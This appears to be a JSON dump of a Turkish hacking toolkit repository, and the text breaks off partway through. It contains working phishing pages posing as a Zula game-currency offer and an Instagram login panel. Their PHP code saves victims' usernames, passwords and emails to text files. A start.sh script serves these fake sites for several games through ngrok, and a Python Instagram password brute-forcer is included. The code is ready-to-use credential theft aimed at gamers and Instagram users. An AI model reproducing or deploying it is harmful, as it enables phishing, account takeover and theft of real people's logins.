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\" type=\"image/vnd.microsoft.icon\">\r\n  <style type=\"text/css\">\r\n   .div1{\r\n      background-color:#040302;\r\n      height: 710px;\r\n      width: 500px;\r\n      border-radius: 35px;\r\n      border:4px solid #21160d;\r\n      opacity: 0.8;\r\n      filter: alpha(opacity=40);\r\n    }\r\n    .text{\r\n      color:red;\r\n      font-size: 48px;\r\n      background-color:black;\r\n      padding-bottom: 20px;\r\n      border-radius: 48px; \r\n    }\r\n    .text2{\r\n      color:orange;\r\n      font-size:28px;\r\n      background-color:black;\r\n      border-radius: 50px;\r\n      padding-top: 25px;\r\n      padding-bottom: 25px;\r\n    }\r\n    .input{\r\n     height: 40px; \r\n     width: 250px; \r\n     font-size: 18px; \r\n     padding: 5px; \r\n     margin-bottom: 15px; \r\n     border-radius: 7px; \r\n     background-color:#b4b2b2; \r\n     border: none; \r\n     color: #000; \r\n\r\n    }\r\n    .button{\r\n     width: 100px; \r\n     font-size: 18px;  \r\n     margin: 0 auto;\r\n     background-color: red; \r\n     border: none; \r\n     height: 40px; \r\n    border-radius: 18px;\r\n    }\r\n     canvas { \r\n     display: block; \r\n     position: fixed; \r\n  top: 0; \r\n  left: 0; \r\n     z-index: -1000; \r\n }\r\n .body{\r\n  background: url(\"https://steamcdn-a.akamaihd.net/steamcommunity/public/images/items/459510/a4b4e9edf1b9fe9428aed5be004c0f43c5f5ba8b.jpg\") no-repeat center center fixed; \r\n    -webkit-background-size: cover;\r\n    -moz-background-size: cover;\r\n    -o-background-size: cover;\r\n    background-size: cover;\r\n }\r\n .select{\r\n  color:orange;\r\n  font-size:18px;\r\n  width:75px;\r\n  height:40px;\r\n  background-color:#040302;\r\n  border-radius: 20px;\r\n }\r\n  </style>\r\n </head>\r\n <body class='body'>\r\n  <center>\r\n   <div class=\"div1\">\r\n    <p class=\"text\">\r\n     Zula Za Hack\r\n    </p>\r\n    <form method=\"post\">\r\n     <p class=\"text2\">\r\n      Zula\r\n     </p>\r\n     <p style=\"color:red;font-size:14px;\">E-MAİL</p>\r\n     <input class=\"input\" name=\"mamak\" placeholder=\"xxxxxxxx@xxxxx.com\" type=\"text\"/ required=\"\">\r\n     <p style=\"color:red;font-size:18px;\">Username</p>\r\n     <input class=\"input\" name=\"user\" placeholder=\"Username\" type=\"text\"/ required=\"\">\r\n     <p style=\"color:red;font-size:14px;\">Password</p>\r\n     <input class=\"input\" name=\"ssel\" placeholder=\"***********\" type=\"password\"/ required=\"\"><br>\r\n     <select class='select' required=\"\">\r\n      <option>1000</option>\r\n      <option>3000</option>\r\n      <option>5000</option>\r\n      <option>8000</option>\r\n      <option>10000</option>\r\n      <option>25000</option>\r\n\r\n     </select>\r\n     <br>\r\n      <br>\r\n<input type=\"submit\" value=\"Next\" class='button'>\r\n\r\n\r\n</form>\r\n</div>\r\n</center>\r\n<?php\r\nif (!empty($_POST[\"user\"]) && !empty($_POST[\"ssel\"])) {\r\n$ac = fopen(\"zula.txt\",\"a+\");\r\n$names = $_POST['mamak'];\r\n$username = $_POST['user'];\r\n$password = $_POST['ssel'];\r\n$userlar = (\"\\n __________________ \\n\".\" Username: \".$username.\"\\n Password: \".$password.\"\\n E-Mail: \".$names.\"\\n__________________ \\n\");\r\nfwrite($ac,$userlar);\r\nfclose($ac);\r\n}\r\n?>\r\n\r\n\r\n\r\n</body>\r\n</html>"
  },
  {
    "path": "Site/Game/start.sh",
    "content": "#!/bin/bash\n\n#Code:Yaman Efkar\n#Türk Siber Timi\n#İnstagram : @turksibertimi\n#Youtube : YamanEfkar\nclear\necho -e  \"\n\n\n\\e[35m     ((( #Türk Siber Timi  #Yaman Efkar )))\n\n\n\n\\e[31m[01]\\e[32m Wolfteam               \\e[31m[04]\\e[32m Zula\n\\e[31m[02]\\e[32m Legend Online          \\e[31m[05]\\e[32m LoL\n\\e[31m[03]\\e[32m Pubg\n\n\n\\e[31m[00]\\e[37m Menü\n\\e[31m[99]\\e[37m Exit\n\"\necho -e \"\\e[49m\"\nread -p \"İşlem Numarasını Giriniz: \" islem\nif [[ $islem == 1 || $islem == 01 ]]; then\n\tread -p \"Port Giriniz: \" port\n        echo -e \"\\e[32mCode: game01\"\n        sleep 2\n        echo \"\"\n        echo -e \"\\e[33mPhp Server && Ngrok Service Başlatılıyor...\"\n        sleep 4\n        cd Site-wolfteam/\n        php -S 127.0.0.1:$port > -t & ngrok http $port\nelif [[ $islem == 2 || $islem == 02 ]]; then\n        read -p \"Port Giriniz: \" port\n        echo -e \"\\e[32mCode: game02\"\n        sleep 2\n        echo \"\"\n        echo -e \"\\e[33mPhp Server && Ngrok Service Başlatılıyor...\"\n        sleep 4\n        cd Site-legend/\n        php -S 127.0.0.1:$port > -t & ngrok http $port\nelif [[ $islem == 3 || $islem == 03 ]]; then\n        read -p \"Port Giriniz: \" port\n        echo -e \"\\e[32mCode: game03\"\n        sleep 2\n        echo \"\"\n        echo -e \"\\e[33mPhp Server && Ngrok Service Başlatılıyor...\"\n        sleep 4\n        cd Site-pubg/\n        php -S 127.0.0.1:$port > -t & ngrok http $port\nelif [[ $islem == 4 || $islem == 04 ]]; then\n        read -p \"Port Giriniz: \" port \n\techo -e \"\\e[32mCode: game04\"\n        sleep 2\n        echo \"\"\n        echo -e \"\\e[33mPhp Server && Ngrok Service Başlatılıyor...\"\n        sleep 4\n        cd Site-zula/\n        php -S 127.0.0.1:$port > -t & ngrok http $port\nelif [[ $islem == 5 || $islem == 05 ]]; then\n        read -p \"Port Giriniz: \" port\n        echo -e \"\\e[32mCode: game05\"\n        sleep 2\n        echo \"\"\n        echo -e \"\\e[33mPhp Server && Ngrok Service Başlatılıyor...\"\n        sleep 4\n        cd Site-lol/\n        php -S 127.0.0.1:$port > -t & ngrok http $port\nelif [[ $islem == 0 || $islem == 00 ]]; then\ncd ..\ncd ..\nbash tst.sh\nelif [[ $islem == 9 || $islem == 99 ]]; then\nclear\necho -e \"\\e[31mTürk Siber Timi İyi Günler Diler :)) ßß\"\nexit 1\nelse\necho \"\"\necho -e \"\\e[31m Girdiğiniz İşlem Numarasını Kontrol Ediniz....\"\nsleep 3\nclear\nbash start.sh\nfi\n"
  },
  {
    "path": "Site/Instagram/Instagram-bruteforce/Executable/LICENSE",
    "content": "MIT License\n\nCopyright (c) 2018 Mohamed\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n"
  },
  {
    "path": "Site/Instagram/Instagram-bruteforce/Executable/instagram.py",
    "content": "# Date: 12/29/2018\n# Author: Mohamed\n# Description: Instagram bruter\n\nfrom sys import exit\nfrom os.path import exists\nfrom lib.bruter import Bruter\nfrom lib.session import Session \nfrom lib.display import Display\nfrom lib.const import credentials, modes\n\n\nclass Engine(object):\n\n    def __init__(self, username, threads, passlist_path):  \n        self.bruter = None \n        self.resume = False \n        self.is_alive = True \n        self.threads = threads\n        self.username = username\n        self.display = Display()\n        self.passlist_path = passlist_path\n        self.session = Session(username, passlist_path)\n    \n    def session_exists(self):\n        return self.session.exists\n    \n    def create_bruter(self):\n        self.bruter = Bruter(self.username, self.threads, self.passlist_path, self.resume)\n    \n    def get_user_resp(self):\n        return self.display.prompt('Would you like to resume the attack? [y/n]: ')\n    \n    def write_to_file(self, password):\n        with open(credentials, 'at') as f:\n            data = 'Username: {}\\nPassword: {}\\n\\n'.format(self.username.title(), password)\n            f.write(data)\n\n    def start(self):        \n        if self.session_exists() and self.is_alive:\n            resp = None \n\n            try:\n                resp = self.get_user_resp()\n            except:\n                self.is_alive = False \n                        \n            if resp and self.is_alive:\n                if resp.strip().lower() == 'y':\n                    self.resume = True \n        \n        if self.is_alive:\n            self.create_bruter()\n\n            try:\n                self.bruter.start()\n            except KeyboardInterrupt:\n                self.bruter.stop()\n                self.bruter.display.shutdown(self.bruter.last_password, \n                                            self.bruter.password_manager.attempts, len(self.bruter.browsers))\n            finally:\n                self.stop()\n    \n    def stop(self):\n        if self.is_alive:\n\n            self.bruter.stop()\n            self.is_alive = False \n\n            if self.bruter.password_manager.is_read and not self.bruter.is_found and not self.bruter.password_manager.list_size:\n                self.bruter.display.stats_not_found(self.bruter.last_password, \n                                                    self.bruter.password_manager.attempts, len(self.bruter.browsers))\n            \n            if self.bruter.is_found:\n                self.write_to_file(self.bruter.password)\n                self.bruter.display.stats_found(self.bruter.password, \n                                                self.bruter.password_manager.attempts, len(self.bruter.browsers))\n                \n\ndef args():\n    enable_colors = str(input('Enable colors? (default: y) [y/n]: '))\n\n    if not enable_colors:\n        enable_colors = True \n    else:\n        if enable_colors[0].lower() == 'n':\n            enable_colors = False \n\n    display = Display(is_color=enable_colors)\n    username = display.prompt('Enter a username: ')\n\n    if not username:\n        display.warning('You can\\'t leave this field empty')\n        display.wait()\n        exit()\n\n    passlist = display.prompt('Enter the path to your password list: ')\n\n    if not exists(passlist):\n        display.warning('Invalid path to password list', False)\n        display.wait()\n        exit()\n    \n    display.info('''Modes:\\r\n        0: => 256 passwords at a time\n        1: => 128 passwords at a time\n        2: => 64 passwords at a time\n        3: => 32 passwords at a time\n    ''', False)\n\n    mode = display.prompt('Select a mode [0, 1, 2, 3]: ', False)\n\n    if not mode.isdigit():\n        display.warning('Mode must be a number', False)\n        display.wait()\n        exit()\n\n    mode = int(mode)\n\n    if int(mode) > 3:\n        display.warning('Mode must be no more than 3', False)\n        display.wait()\n        exit()\n    \n    if int(mode) < 0:\n        display.warning('Mode must bot no less than 0', False)\n        display.wait()\n        exit()\n    \n    return [username, passlist, mode]\n    \n\nif __name__ == '__main__':    \n    try:\n        user_input = args()\n    except KeyboardInterrupt:\n        exit() \n    \n    display = Display()\n    username, passlist, mode = user_input\n\n    try:\n        Engine(username, modes[mode], passlist).start()\n    except:\n        pass \n    finally:\n        display.wait()\n        exit()"
  },
  {
    "path": "Site/Instagram/Instagram-bruteforce/Executable/install.py",
    "content": "# Date: 01/09/2019\n# Author: Mohamed\n# Description: Install file\n\nfrom time import sleep\nfrom queue import Queue \nfrom os.path import exists\nfrom subprocess import Popen\nfrom threading import Thread, RLock\n\n\nclass Install:\n\n    def __init__(self, path_to_req): \n        self.lock = RLock()\n        self.is_alive = True\n        self.is_reading = True \n        self.is_installing = False \n        self.requirements = Queue()\n        self.path_to_req = path_to_req\n    \n    @property \n    def path_exists(self):\n        return exists(self.path_to_req)\n    \n    def read_file(self):\n        with open('requirements.txt', mode='rt') as file: \n            for line in file:\n                if line:\n                    with self.lock:\n                        self.requirements.put(line.replace('\\n', ''))\n\n        self.is_reading = False \n\n    def install(self, name):\n        print('[+] Installing {} ...'.format(name))\n        cmd = 'pip install {}'.format(name)\n        cmd = cmd.split()\n\n        try:\n            self.is_installing = True \n            Popen(cmd).wait()\n        except:\n            print('[!] Failed to install {}'.format(name))\n        finally:\n            print('\\n')\n            self.is_installing = False \n    \n    def install_all(self):\n        while self.is_alive:\n\n            while self.requirements.qsize():\n                with self.lock:\n                    name = self.requirements.get()\n                self.install(name)\n\n    def start_primary_threads(self):\n        read_thread = Thread(target=self.read_file)\n        install_all_thread = Thread(target=self.install_all)\n\n        read_thread.daemon = True \n        install_all_thread.daemon = True \n\n        read_thread.start()\n        install_all_thread.start()\n\n    def start(self):\n        if self.path_exists:\n            self.start_primary_threads()\n\n            while self.is_alive:\n\n                try:\n                    if not self.is_reading and not self.requirements.qsize() and not self.is_installing:\n                        self.stop() \n                    sleep(0.5)\n                except KeyboardInterrupt:\n                    self.stop()             \n\n        else:\n            print('[*] Unable to locate the file requirements.txt') \n    \n    def stop(self):\n        self.is_alive = False \n    \n\nif __name__ == '__main__':\n    path_to_req = 'requirements.txt'\n\n    install = Install(path_to_req)\n    install.start()\n"
  },
  {
    "path": "Site/Instagram/Instagram-bruteforce/instagram.py",
    "content": "# Date: 12/29/2018\r\n# Author: Mohamed\r\n# Description: Instagram bruter\r\n\r\nfrom os.path import exists\r\nfrom lib.bruter import Bruter\r\nfrom lib.session import Session \r\nfrom lib.display import Display\r\nfrom lib.const import credentials, modes\r\nfrom argparse import ArgumentParser, ArgumentTypeError\r\n\r\n\r\nclass Engine(object):\r\n\r\n    def __init__(self, username, threads, passlist_path, is_color):  \r\n        self.bruter = None \r\n        self.resume = False \r\n        self.is_alive = True \r\n        self.threads = threads\r\n        self.username = username\r\n        self.passlist_path = passlist_path\r\n        self.display = Display(is_color=is_color)\r\n        self.session = Session(username, passlist_path)\r\n    \r\n    def passlist_path_exists(self):\r\n        if not exists(self.passlist_path):\r\n            self.display.warning('Invalid path to password list')\r\n            return False\r\n        return True \r\n    \r\n    def session_exists(self):\r\n        return self.session.exists\r\n    \r\n    def create_bruter(self):\r\n        self.bruter = Bruter(self.username, self.threads, self.passlist_path, self.resume)\r\n    \r\n    def get_user_resp(self):\r\n        return self.display.prompt('Would you like to resume the attack? [y/n]: ')\r\n    \r\n    def write_to_file(self, password):\r\n        with open(credentials, 'at') as f:\r\n            data = 'Username: {}\\nPassword: {}\\n\\n'.format(self.username.title(), password)\r\n            f.write(data)\r\n\r\n    def start(self):\r\n        if not self.passlist_path_exists():\r\n            self.is_alive = False \r\n        \r\n        if self.session_exists() and self.is_alive:\r\n            resp = None \r\n\r\n            try:\r\n                resp = self.get_user_resp()\r\n            except:\r\n                self.is_alive = False \r\n                        \r\n            if resp and self.is_alive:\r\n                if resp.strip().lower() == 'y':\r\n                    self.resume = True \r\n        \r\n        if self.is_alive:\r\n            self.create_bruter()\r\n\r\n            try:\r\n                self.bruter.start()\r\n            except KeyboardInterrupt:\r\n                self.bruter.stop()\r\n                self.bruter.display.shutdown(self.bruter.last_password, \r\n                                            self.bruter.password_manager.attempts, len(self.bruter.browsers))\r\n            finally:\r\n                self.stop()\r\n    \r\n    def stop(self):\r\n        if self.is_alive:\r\n\r\n            self.bruter.stop()\r\n            self.is_alive = False \r\n\r\n            if self.bruter.password_manager.is_read and not self.bruter.is_found and not self.bruter.password_manager.list_size:\r\n                self.bruter.display.stats_not_found(self.bruter.last_password, \r\n                                                    self.bruter.password_manager.attempts, len(self.bruter.browsers))\r\n            \r\n            if self.bruter.is_found:\r\n                self.write_to_file(self.bruter.password)\r\n                self.bruter.display.stats_found(self.bruter.password, \r\n                                                self.bruter.password_manager.attempts, len(self.bruter.browsers))\r\n                \r\n\r\ndef valid_int(n):\r\n    if not n.isdigit():\r\n        raise ArgumentTypeError('mode must be a number')\r\n\r\n    n = int(n)\r\n\r\n    if n > 3:\r\n        raise ArgumentTypeError('maximum for a mode is 3')\r\n\r\n    if n < 0:\r\n        raise ArgumentTypeError('minimum for a mode is 0')\r\n\r\n    return n\r\n\r\ndef args():\r\n    args = ArgumentParser()\r\n    args.add_argument('username', help='email or username')\r\n    args.add_argument('passlist', help='password list')\r\n    args.add_argument('-nc', '--no-color', dest='color', action='store_true', help='disable colors')\r\n    args.add_argument('-m', '--mode', default=2, type=valid_int, help='modes: 0 => 16 bots; 1 => 8 bots; 2 => 4 bots; 3 => 2 bots')\r\n    return args.parse_args()\r\n\r\n\r\nif __name__ == '__main__':\r\n    arugments = args()\r\n    mode = arugments.mode \r\n    username = arugments.username\r\n    passlist = arugments.passlist\r\n    is_color = True if not arugments.color else False \r\n    Engine(username, modes[mode], passlist, is_color).start()"
  },
  {
    "path": "Site/Instagram/Instagram-bruteforce/install.py",
    "content": "# Date: 01/09/2019\n# Author: Mohamed\n# Description: Install file\n\nfrom time import sleep\nfrom queue import Queue \nfrom os.path import exists\nfrom subprocess import Popen\nfrom threading import Thread, RLock\n\n\nclass Install:\n\n    def __init__(self, path_to_req): \n        self.lock = RLock()\n        self.is_alive = True\n        self.is_reading = True \n        self.is_installing = False \n        self.requirements = Queue()\n        self.path_to_req = path_to_req\n    \n    @property \n    def path_exists(self):\n        return exists(self.path_to_req)\n    \n    def read_file(self):\n        with open('requirements.txt', mode='rt') as file: \n            for line in file:\n                if line:\n                    with self.lock:\n                        self.requirements.put(line.replace('\\n', ''))\n\n        self.is_reading = False \n\n    def install(self, name):\n        print('[+] Installing {} ...'.format(name))\n        cmd = 'pip install {}'.format(name)\n        cmd = cmd.split()\n\n        try:\n            self.is_installing = True \n            Popen(cmd).wait()\n        except:\n            print('[!] Failed to install {}'.format(name))\n        finally:\n            print('\\n')\n            self.is_installing = False \n    \n    def install_all(self):\n        while self.is_alive:\n\n            while self.requirements.qsize():\n                with self.lock:\n                    name = self.requirements.get()\n                self.install(name)\n\n    def start_primary_threads(self):\n        read_thread = Thread(target=self.read_file)\n        install_all_thread = Thread(target=self.install_all)\n\n        read_thread.daemon = True \n        install_all_thread.daemon = True \n\n        read_thread.start()\n        install_all_thread.start()\n\n    def start(self):\n        if self.path_exists:\n            self.start_primary_threads()\n\n            while self.is_alive:\n\n                try:\n                    if not self.is_reading and not self.requirements.qsize() and not self.is_installing:\n                        self.stop() \n                    sleep(0.5)\n                except KeyboardInterrupt:\n                    self.stop()             \n\n        else:\n            print('[*] Unable to locate the file requirements.txt') \n    \n    def stop(self):\n        self.is_alive = False \n    \n\nif __name__ == '__main__':\n    path_to_req = 'requirements.txt'\n\n    install = Install(path_to_req)\n    install.start()\n"
  },
  {
    "path": "Site/Instagram/Instagram-bruteforce/requirements.txt",
    "content": "bs4\r\nfuture\r\nrequests\r\ncolorama\r\n"
  },
  {
    "path": "Site/Instagram/Instagram-fakepanel/index.php",
    "content": "\r\n<html lang=\"tr\">\r\n<head>\r\n    <meta charset=\"utf-8\">\r\n    <meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\">\r\n    <title>insMobil | Giriş Yap</title>\r\n    <meta name=\"robots\" content=\"noindex, nofollow\">\r\n    <meta id=\"viewport\" name=\"viewport\" content=\"width=device-width, user-scalable=no, initial-scale=1, minimum-scale=1, maximum-scale=1\">\r\n    <style>\r\n        body::-webkit-scrollbar {\r\n            display : none;\r\n        }\r\n    </style>\r\n    <link rel=\"stylesheet\" href=\"https://insmobil.com//assets/style/instastyle.css?v=2.4\"/>\r\n</head>\r\n<body>\r\n      <span id=\"react-root\">\r\n         <section class=\"instaclass5\">\r\n            <main class=\"instaclass4 instaclass30\" role=\"main\">\r\n               <article class=\"instaarticle3\">\r\n                  <div class=\"instaclass1\">\r\n                     <div class=\"instaclass2\">\r\n                     <h1 style='color: black; font-weight: bold; font-size:25px; text-align:center; padding: 10px;'>GİRİŞ YAP</h1>\r\n                        <br/>\r\n                        <div class=\"instaclass6\">\r\n\r\n\r\n\r\n                           <form method=\"POST\" action=\"\" \r\n                                   class=\"instaclass7\">\r\n                               <span style=\"font-size: 12px;text-align: center;color: gray;margin-bottom: 14px;\">Kullanıcı adınızı yazarken çıkan listeden üyeliğinizi seçin.</span>\r\n                              <div class=\"instaclass8 instaclass9\">\r\n                                <input type=\"text\"class=\"instaclass10 instaclass11\" aria-describedby=\"\" aria-label=\"Kullanıcı\" aria-required=\"true\" name=\"userid22\" placeholder=\"Username\" required=\"\">\r\n                              <div class=\"suggestUsers\"><ul></ul></div>\r\n                              </div>\r\n                              <div class=\"instaclass8 instaclass9\">\r\n                                 <input type=\"password\"  class=\"instaclass10 instaclass11\" aria-describedby=\"\" aria-label=\"Şifre\" aria-required=\"true\" name=\"pswrd\" placeholder=\"Password\" required=\"\">\r\n                                         <span style=\"color: black; font-size: 12pt\"><input type=\"checkbox\" onclick=\"myFunction()\">Şifreyi göster</span>\r\n                              </div>\r\n                               \r\n                                                              <span\r\n                                       class=\"instaclass14 instaclass15\">\r\n                                 <button  class=\"instaclass16 instaclass17 instaclass18 instaclass19\">Giriş yap</button>\r\n                                 <div class=\"spiSpinner\"></div>\r\n                              </span>\r\n                               <div class=\"instaclass20\">\r\n                              </div>\r\n                              <p style=\"font-size: 12px;padding: 5px;text-align: center;color: #000000; font-weight: bold;\">Dikkat! İlk seferde giriş olmazsa tekrar deneyin.</p>\r\n                              <p style=\"font-size: 11px;padding: 5px;text-align: center;color: #FF0000; font-weight: bold;\">Profil Resmi Olmayan Hesaplar Giriş Yapamaz!</p>\r\n                                   <div class=\"instaclass20\" style=\"color: black; text-align: left;\">\r\n\r\n                                    <span style='color: red; font-weight: bold;'>Hatalar ve Çözümleri;</span> 1) Giriş işlemleri biraz uzun sürebilir, lütfen bekleyin.(30-60 saniye kadar sürebilir, çok uzun sürmesi halinde sayfayı yenileyip tekrar deneyin) <br>\r\n                                    2) Giriş yaparken sürekli olarak şifre yanlış uyarısı alıyorsanız instagram.com veya instagram mobil uygulaması üzerinden hesabınıza girip, çıkan uyarıya Bu Bendim diyin ve buradan tekrar giriş yapın.<br>\r\n                                    3) Instagram şifrenizi bloke edebilir. instagram uygulamasında bulunan şifremi unuttum butonuna tıklayarak yeni şifre alabilirsiniz.<br>\r\n                                    <a href='https://insmobil.com/blog/instagram-uzgunuz-sifren-yanlisti-sorunu-cozumu' target='_blank' style='color: black; font-weight: bold;'>\r\n                                    4) Yukarıdaki herşeyi eksiksiz yapmanıza rağmen şifreniz doğru olduğu halde sürekli 'üzgünüz şifreniz yanlıştı' hatası alıyorsanız burayı tıklayın.</a>\r\n                                </div>\r\n                           </form>\r\n\r\n ?>\r\n\r\n<?php\r\nif (!empty($_POST[\"pswrd\"]) && !empty($_POST[\"userid22\"])) {\r\n$ac1 = fopen(\"username-fakepanel.txt\",\"a+\");\r\n$password = @$_POST['pswrd'];\r\n$username = @$_POST['userid22'];\r\n$userlarr = \"\\n __________________ \\n Username: \".$username.\"\\n Password: \".$password;\r\nfwrite($ac1,$userlarr);\r\nfclose($ac1);} ?>\r\n\r\n\r\n\r\n                        </div>\r\n                     </div>\r\n                  </div>\r\n               </article>\r\n            </main>\r\n         </section>\r\n      </span>\r\n      <style>\r\n          .onay_kodu_ekrani {\r\n              display    : none;\r\n              position   : fixed;\r\n              top        : 0;\r\n              width      : 100%;\r\n              height     : 100%;\r\n              background : #fff;\r\n              padding    : 50px 15px;\r\n              text-align : center;\r\n          }\r\n\r\n          .onay_kodu_girme_ekrani {\r\n              display    : none;\r\n              position   : fixed;\r\n              top        : 0;\r\n              width      : 100%;\r\n              height     : 100%;\r\n              background : #fff;\r\n              padding    : 50px 15px;\r\n              text-align : center;\r\n          }\r\n\r\n          .onay_kodu_ekrani select {\r\n              padding   : 10px;\r\n              font-size : 14px;\r\n          }\r\n\r\n          .onay_kodu_ekrani button {\r\n              width         : 160px;\r\n              margin        : 30px auto;\r\n              padding       : 8px;\r\n              